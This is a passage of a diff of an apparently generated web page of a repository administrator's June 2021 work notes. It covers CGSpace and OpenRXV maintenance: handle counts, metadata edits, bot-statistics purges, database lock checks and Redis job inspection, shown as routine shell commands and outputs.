                                                                                                                                                                                                                                                                                                                                                                                                                                    -      2 "10568/99411"
                                                                                                                                                                                                                                                                                                                                                                                                                                    -      2 "10568/99516"
                                                                                                                                                                                                                                                                                                                                                                                                                                    -      3 "10568/102093"
                                                                                                                                                                                                                                                                                                                                                                                                                                    -      3 "10568/103524"
                                                                                                                                                                                                                                                                                                                                                                                                                                    -      3 "10568/106664"
                                                                                                                                                                                                                                                                                                                                                                                                                                    -      3 "10568/106940"
                                                                                                                                                                                                                                                                                                                                                                                                                                    -      3 "10568/107195"
                                                                                                                                                                                                                                                                                                                                                                                                                                    -      3 "10568/96546"
                                                                                                                                                                                                                                                                                                                                                                                                                                    -

                                                                                                                                                                                                                                                                                                                                                                                                                                    2021-06-20

                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                    $ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data.json | awk -F: '{print $2}' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                    +90459
                                                                                                                                                                                                                                                                                                                                                                                                                                    +$ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data.json | awk -F: '{print $2}' | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                    +90380
                                                                                                                                                                                                                                                                                                                                                                                                                                    +$ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data.json | awk -F: '{print $2}' | sort | uniq -c | sort -h
                                                                                                                                                                                                                                                                                                                                                                                                                                    +...
                                                                                                                                                                                                                                                                                                                                                                                                                                    +      2 "10568/99409"
                                                                                                                                                                                                                                                                                                                                                                                                                                    +      2 "10568/99410"
                                                                                                                                                                                                                                                                                                                                                                                                                                    +      2 "10568/99411"
                                                                                                                                                                                                                                                                                                                                                                                                                                    +      2 "10568/99516"
                                                                                                                                                                                                                                                                                                                                                                                                                                    +      3 "10568/102093"
                                                                                                                                                                                                                                                                                                                                                                                                                                    +      3 "10568/103524"
                                                                                                                                                                                                                                                                                                                                                                                                                                    +      3 "10568/106664"
                                                                                                                                                                                                                                                                                                                                                                                                                                    +      3 "10568/106940"
                                                                                                                                                                                                                                                                                                                                                                                                                                    +      3 "10568/107195"
                                                                                                                                                                                                                                                                                                                                                                                                                                    +      3 "10568/96546"
                                                                                                                                                                                                                                                                                                                                                                                                                                    +

                                                                                                                                                                                                                                                                                                                                                                                                                                    2021-06-20

                                                                                                                                                                                                                                                                                                                                                                                                                                    • Udana asked me to update their IWMI subjects from farmer managed irrigation systems to farmer-led irrigation
                                                                                                                                                                                                                                                                                                                                                                                                                                        @@ -255,12 +255,12 @@ $ grep -oE '"handle":"[[:digit:]]+/[
                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                    $ dspace metadata-export -i 10568/16814 -f /tmp/2021-06-20-IWMI.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                      $ dspace metadata-export -i 10568/16814 -f /tmp/2021-06-20-IWMI.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Then I used csvcut to extract just the columns I needed and do the replacement into a new CSV:
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                      $ csvcut -c 'id,dcterms.subject[],dcterms.subject[en_US]' /tmp/2021-06-20-IWMI.csv | sed 's/farmer managed irrigation systems/farmer-led irrigation/' > /tmp/2021-06-20-IWMI-new-subjects.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                        $ csvcut -c 'id,dcterms.subject[],dcterms.subject[en_US]' /tmp/2021-06-20-IWMI.csv | sed 's/farmer managed irrigation systems/farmer-led irrigation/' > /tmp/2021-06-20-IWMI-new-subjects.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Then I uploaded the resulting CSV to CGSpace, updating 161 items
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Start a harvest on AReS
                                                                                                                                                                                                                                                                                                                                                                                                                                        • I found a bug and a patch for the private items showing up in the DSpace sitemap bug @@ -278,19 +278,19 @@ $ grep -oE '"handle":"[[:digit:]]+/[
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                      $ grep -E '"repo":"CGSpace"' openrxv-items_data.json | grep -oE '"handle":"[[:digit:]]+/[[:alnum:]]+"' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                      -90937
                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ grep -E '"repo":"CGSpace"' openrxv-items_data.json | grep -oE '"handle":"[[:digit:]]+/[[:alnum:]]+"' | sort -u | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                      -85709
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                        $ grep -E '"repo":"CGSpace"' openrxv-items_data.json | grep -oE '"handle":"[[:digit:]]+/[[:alnum:]]+"' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                        +90937
                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ grep -E '"repo":"CGSpace"' openrxv-items_data.json | grep -oE '"handle":"[[:digit:]]+/[[:alnum:]]+"' | sort -u | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                        +85709
                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                        • So those could be duplicates from the way we harvest pages, but they could also be from mappings…
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Manually inspecting the duplicates where handles appear more than once:
                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                        $ grep -E '"repo":"CGSpace"' openrxv-items_data.json | grep -oE '"handle":"[[:digit:]]+/[[:alnum:]]+"' | sort | uniq -c | sort -h
                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                          $ grep -E '"repo":"CGSpace"' openrxv-items_data.json | grep -oE '"handle":"[[:digit:]]+/[[:alnum:]]+"' | sort | uniq -c | sort -h
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Unfortunately I found no pattern:
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Some appear twice in the Elasticsearch index, but appear in only one collection
                                                                                                                                                                                                                                                                                                                                                                                                                                            • @@ -312,23 +312,23 @@ $ grep -E '"repo":"CGSpace"'
                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                          $ curl -s -H "Accept: application/json" "https://demo.dspace.org/rest/items?offset=0&limit=5" | jq length
                                                                                                                                                                                                                                                                                                                                                                                                                                          -5
                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ curl -s -H "Accept: application/json" "https://demo.dspace.org/rest/items?offset=0&limit=5" | jq '.[].handle'
                                                                                                                                                                                                                                                                                                                                                                                                                                          -"10673/4"
                                                                                                                                                                                                                                                                                                                                                                                                                                          -"10673/3"
                                                                                                                                                                                                                                                                                                                                                                                                                                          -"10673/6"
                                                                                                                                                                                                                                                                                                                                                                                                                                          -"10673/5"
                                                                                                                                                                                                                                                                                                                                                                                                                                          -"10673/7"
                                                                                                                                                                                                                                                                                                                                                                                                                                          -# log into DSpace Demo XMLUI as admin and make one item private (for example 10673/6)
                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ curl -s -H "Accept: application/json" "https://demo.dspace.org/rest/items?offset=0&limit=5" | jq length       
                                                                                                                                                                                                                                                                                                                                                                                                                                          -4
                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ curl -s -H "Accept: application/json" "https://demo.dspace.org/rest/items?offset=0&limit=5" | jq '.[].handle' 
                                                                                                                                                                                                                                                                                                                                                                                                                                          -"10673/4"
                                                                                                                                                                                                                                                                                                                                                                                                                                          -"10673/3"
                                                                                                                                                                                                                                                                                                                                                                                                                                          -"10673/5"
                                                                                                                                                                                                                                                                                                                                                                                                                                          -"10673/7"
                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                            $ curl -s -H "Accept: application/json" "https://demo.dspace.org/rest/items?offset=0&limit=5" | jq length
                                                                                                                                                                                                                                                                                                                                                                                                                                            +5
                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ curl -s -H "Accept: application/json" "https://demo.dspace.org/rest/items?offset=0&limit=5" | jq '.[].handle'
                                                                                                                                                                                                                                                                                                                                                                                                                                            +"10673/4"
                                                                                                                                                                                                                                                                                                                                                                                                                                            +"10673/3"
                                                                                                                                                                                                                                                                                                                                                                                                                                            +"10673/6"
                                                                                                                                                                                                                                                                                                                                                                                                                                            +"10673/5"
                                                                                                                                                                                                                                                                                                                                                                                                                                            +"10673/7"
                                                                                                                                                                                                                                                                                                                                                                                                                                            +# log into DSpace Demo XMLUI as admin and make one item private (for example 10673/6)
                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ curl -s -H "Accept: application/json" "https://demo.dspace.org/rest/items?offset=0&limit=5" | jq length       
                                                                                                                                                                                                                                                                                                                                                                                                                                            +4
                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ curl -s -H "Accept: application/json" "https://demo.dspace.org/rest/items?offset=0&limit=5" | jq '.[].handle' 
                                                                                                                                                                                                                                                                                                                                                                                                                                            +"10673/4"
                                                                                                                                                                                                                                                                                                                                                                                                                                            +"10673/3"
                                                                                                                                                                                                                                                                                                                                                                                                                                            +"10673/5"
                                                                                                                                                                                                                                                                                                                                                                                                                                            +"10673/7"
                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                            • I tested the pull request on DSpace Test and it works, so I left a note on GitHub and Jira
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Last week I noticed that the Gender Platform website is using “cgspace.cgiar.org” links for CGSpace, instead of handles
                                                                                                                                                                                                                                                                                                                                                                                                                                                @@ -355,11 +355,11 @@ $ curl -s -H "Accept: application/json"
                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                              $ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data-local-ds-4065.json | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                              -90327
                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data-local-ds-4065.json | sort -u | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                              -90317
                                                                                                                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                                                                                                                              2021-06-22

                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                              $ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data-local-ds-4065.json | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                              +90327
                                                                                                                                                                                                                                                                                                                                                                                                                                              +$ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data-local-ds-4065.json | sort -u | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                              +90317
                                                                                                                                                                                                                                                                                                                                                                                                                                              +

                                                                                                                                                                                                                                                                                                                                                                                                                                              2021-06-22

                                                                                                                                                                                                                                                                                                                                                                                                                                              • Make a pull request to the COUNTER-Robots project to add two new user agents: crusty and newspaper
                                                                                                                                                                                                                                                                                                                                                                                                                                                  @@ -368,13 +368,13 @@ $ grep -oE '"handle":"[[:digit:]]+/[
                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                              $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p   
                                                                                                                                                                                                                                                                                                                                                                                                                                              -Purging 1339 hits from RI\/1\.0 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                              -Purging 447 hits from crusty in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                              -Purging 3736 hits from newspaper in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                              -Total number of bot hits purged: 5522
                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p   
                                                                                                                                                                                                                                                                                                                                                                                                                                                +Purging 1339 hits from RI\/1\.0 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                +Purging 447 hits from crusty in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                +Purging 3736 hits from newspaper in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                +Total number of bot hits purged: 5522
                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Surprised to see RI/1.0 in there because it’s been in the override file for a while
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Looking at the 2021 statistics in Solr I see a few more suspicious user agents:
                                                                                                                                                                                                                                                                                                                                                                                                                                                    @@ -397,11 +397,11 @@ Purging 3736 hits from newspaper in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                # journalctl --since=today -u tomcat7 | grep -c 'Connection has been abandoned'
                                                                                                                                                                                                                                                                                                                                                                                                                                                -978
                                                                                                                                                                                                                                                                                                                                                                                                                                                -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                -10100
                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                  # journalctl --since=today -u tomcat7 | grep -c 'Connection has been abandoned'
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +978
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +10100
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • I sent a message to Atmire, hoping that the database logging stuff they put in place last time this happened will be of help now
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • In the mean time, I decided to upgrade Tomcat from 7.0.107 to 7.0.109, and the PostgreSQL JDBC driver from 42.2.20 to 42.2.22 (first on DSpace Test)
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • I also applied the following patches from the 6.4 milestone to our 6_x-prod branch: @@ -412,17 +412,17 @@ $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN p
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • After upgrading and restarting Tomcat the database connections and locks were back down to normal levels:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                  -63
                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                    +63
                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Looking in the DSpace log, the first “pool empty” message I saw this morning was at 4AM:
                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                    2021-06-23 04:01:14,596 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ [http-bio-127.0.0.1-8443-exec-4323] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:250; idle:0; lastwait:5000].
                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                      2021-06-23 04:01:14,596 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ [http-bio-127.0.0.1-8443-exec-4323] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:250; idle:0; lastwait:5000].
                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Oh, and I notice 8,000 hits from a Flipboard bot using this user-agent:
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                      Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0 (FlipboardProxy/1.2; +http://flipboard.com/browserproxy)
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                        Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0 (FlipboardProxy/1.2; +http://flipboard.com/browserproxy)
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • We can purge them, as this is not user traffic: https://about.flipboard.com/browserproxy/
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I will add it to our local user agent pattern file and eventually submit a pull request to COUNTER-Robots
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • @@ -448,17 +448,17 @@ $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN p
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ grep -oE '"handle":"([[:digit:]]|\.)+/[[:digit:]]+"' cgspace-openrxv-items-temp-backup.json | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -104797
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -$ grep -oE '"handle":"([[:digit:]]|\.)+/[[:digit:]]+"' cgspace-openrxv-items-temp-backup.json | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -99186
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ grep -oE '"handle":"([[:digit:]]|\.)+/[[:digit:]]+"' cgspace-openrxv-items-temp-backup.json | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +104797
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +$ grep -oE '"handle":"([[:digit:]]|\.)+/[[:digit:]]+"' cgspace-openrxv-items-temp-backup.json | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +99186
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • This number is probably unique for that particular harvest, but I don’t think it represents the true number of items…
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • The harvest of DSpace Test I did on my local test instance yesterday has about 91,000 items:
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ grep -E '"repo":"DSpace Test"' 2021-06-23-openrxv-items-final-local.json | grep -oE '"handle":"([[:digit:]]|\.)+/[[:digit:]]+"' | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -90990
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                            $ grep -E '"repo":"DSpace Test"' 2021-06-23-openrxv-items-final-local.json | grep -oE '"handle":"([[:digit:]]|\.)+/[[:digit:]]+"' | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                            +90990
                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • So the harvest on the live site is missing items, then why didn’t the add missing items plugin find them?!
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • I notice that we are missing the type in the metadata structure config for each repository on the production site, and we are using type for item type in the actual schema… so maybe there is a conflict there
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • @@ -469,8 +469,8 @@ $ grep -oE '"handle":"([[:digit:]]|\
                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                            172.104.229.92 - - [24/Jun/2021:07:52:58 +0200] "GET /sitemap HTTP/1.1" 503 190 "-" "OpenRXV harvesting bot; https://github.com/ilri/OpenRXV"
                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              172.104.229.92 - - [24/Jun/2021:07:52:58 +0200] "GET /sitemap HTTP/1.1" 503 190 "-" "OpenRXV harvesting bot; https://github.com/ilri/OpenRXV"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • I fixed nginx so it always allows people to get the sitemap and then re-ran the plugins… now it’s checking 180,000+ handles to see if they are collections or items…
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • I see it fetched the sitemap three times, we need to make sure it’s only doing it once for each repository
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • @@ -478,9 +478,9 @@ $ grep -oE '"handle":"([[:digit:]]|\
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • According to the api logs we will be adding 5,697 items:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                $ docker logs api 2>/dev/null | grep dspace_add_missing_items | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                -5697
                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ docker logs api 2>/dev/null | grep dspace_add_missing_items | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +5697
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Spent a few hours with Moayad troubleshooting and improving OpenRXV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • We found a bug in the harvesting code that can occur when you are harvesting DSpace 5 and DSpace 6 instances, as DSpace 5 uses numeric (long) IDs, and DSpace 6 uses UUIDs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • @@ -496,35 +496,35 @@ $ grep -oE '"handle":"([[:digit:]]|\
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ redis-cli
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -127.0.0.1:6379> SCAN 0 COUNT 5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -1) "49152"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -2) 1) "bull:plugins:476595"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -   2) "bull:plugins:367382"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -   3) "bull:plugins:369228"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -   4) "bull:plugins:438986"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -   5) "bull:plugins:366215"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ redis-cli
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +127.0.0.1:6379> SCAN 0 COUNT 5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +1) "49152"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +2) 1) "bull:plugins:476595"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +   2) "bull:plugins:367382"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +   3) "bull:plugins:369228"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +   4) "bull:plugins:438986"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +   5) "bull:plugins:366215"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • We can apparently get the names of the jobs in each hash using hget:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    127.0.0.1:6379> TYPE bull:plugins:401827
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -hash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -127.0.0.1:6379> HGET bull:plugins:401827 name
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -"dspace_add_missing_items"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      127.0.0.1:6379> TYPE bull:plugins:401827
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +hash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +127.0.0.1:6379> HGET bull:plugins:401827 name
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +"dspace_add_missing_items"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • I whipped up a one liner to get the keys for all plugin jobs, convert to redis HGET commands to extract the value of the name field, and then sort them by their counts:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ redis-cli KEYS "bull:plugins:*" \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -  | sed -e 's/^bull/HGET bull/' -e 's/\([[:digit:]]\)$/\1 name/' \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -  | ncat -w 3 localhost 6379 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -  | grep -v -E '^\$' | sort | uniq -c | sort -h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -      3 dspace_health_check
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -      4 -ERR wrong number of arguments for 'hget' command
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -     12 mel_downloads_and_views
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -    129 dspace_altmetrics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -    932 dspace_downloads_and_views
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      - 186428 dspace_add_missing_items
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ redis-cli KEYS "bull:plugins:*" \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +  | sed -e 's/^bull/HGET bull/' -e 's/\([[:digit:]]\)$/\1 name/' \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +  | ncat -w 3 localhost 6379 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +  | grep -v -E '^\$' | sort | uniq -c | sort -h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +      3 dspace_health_check
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +      4 -ERR wrong number of arguments for 'hget' command
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +     12 mel_downloads_and_views
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +    129 dspace_altmetrics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +    932 dspace_downloads_and_views
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        + 186428 dspace_add_missing_items
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Note that this uses ncat to send commands directly to redis all at once instead of one at a time (netcat didn’t work here, as it doesn’t know when our input is finished and never quits)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I thought of using redis-cli --pipe but then you have to construct the commands in the redis protocol format with the number of args and length of each command
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • @@ -544,49 +544,49 @@ hash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Looking at the DSpace log I see there was definitely a higher number of sessions that day, perhaps twice the normal:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            $ for file in dspace.log.2021-06-[12]*; do echo "$file"; grep -oE 'session_id=[A-Z0-9]{32}' "$file" | sort | uniq | wc -l; done
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -19072
